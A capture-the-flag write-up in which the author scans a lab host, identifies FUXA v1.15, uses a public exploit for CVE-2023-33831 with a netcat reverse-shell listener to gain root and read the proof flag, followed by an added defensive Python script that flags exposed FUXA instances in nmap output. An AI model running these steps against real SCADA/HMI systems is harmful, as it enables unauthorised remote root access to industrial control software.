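Key takeaways
- Even when the web application is not working properly and will not load, it is still worth trying to compromise the backend
Steps
The nmap scan shows ports 22 and 1881 open, with FUXA running on port 1881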
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-01 06:30 UTC
Nmap scan report for #remote_ip#
Host is up (0.00060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
1881/tcp open http Node.js Express framework
|_http-title: FUXA
|_http-cors: GET POST PUT DELETE
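Browsing to port 1881 shows that FUXA v1.15 is running, but the page returns an error
Searching for FUXA vulnerabilities turns up CVE-2023-33831. It matches the title of the target machine, so this is almost certainly the one: GitHub - rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831: Description and exploit of CVE-2023-33831 affecting FUXA web-based Process Visualization (SCADA/HMI/Dashboard) software.
After downloading it, first run nc -nlvp 80 locally, then run the exploit, which gives root privileges. It seems quite simple and not too difficult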
C:\home\kali\Documents\OFFSEC\GoToWork\CVE-2023-33831> nc -nlvp 80
listening on [any] 80 ...
connect to [#remote_ip#] from (UNKNOWN) [#local_ip#] 33770
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/proof.txt
a5c7287ff6267099143f14c60506aac0
#
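Seen from the defender's side, the nmap result at the top of this write-up is exactly what an exposure audit should catch. The following is an added example, not part of the original write-up: it parses nmap normal output and flags hosts whose HTTP title identifies a FUXA instance, so that access can be restricted and the installed version checked. The sample scan is constructed from the output shown above, and the 192.0.2.x addresses and function names are assumptions.

```python
import re

# Constructed sample: nmap normal output modelled on the scan in this write-up,
# with documentation-range addresses in place of the redacted target.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
1881/tcp open http Node.js Express framework
|_http-title: FUXA
|_http-cors: GET POST PUT DELETE
Nmap scan report for 192.0.2.11
PORT STATE SERVICE VERSION
80/tcp open http nginx
|_http-title: Welcome to nginx!
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")

def parse_nmap(text):
    """Return {host: {port: {"service", "version", "scripts"}}} for open ports."""
    hosts, host, port = {}, None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, port = m.group(1), None
            hosts[host] = {}
        elif host and (m := PORT_RE.match(line)):
            port = int(m.group(1))
            hosts[host][port] = {"service": m.group(3), "version": m.group(4), "scripts": {}}
        elif host and port and (m := SCRIPT_RE.match(line)):
            # NSE script output lines ("|_http-title: ...") belong to the last port seen.
            hosts[host][port]["scripts"][m.group(1)] = m.group(2)
    return hosts

def exposed_fuxa(hosts):
    """List (host, port, cors) where the HTTP title identifies a FUXA instance."""
    findings = []
    for host, ports in hosts.items():
        for port, info in ports.items():
            if info["scripts"].get("http-title", "").strip().upper() == "FUXA":
                findings.append((host, port, info["scripts"].get("http-cors", "")))
    return findings

if __name__ == "__main__":
    for host, port, cors in exposed_fuxa(parse_nmap(SAMPLE_SCAN)):
        print(f"{host}:{port} exposes FUXA (CORS methods: {cors or 'n/a'}); "
              "restrict network access and check the installed version")
```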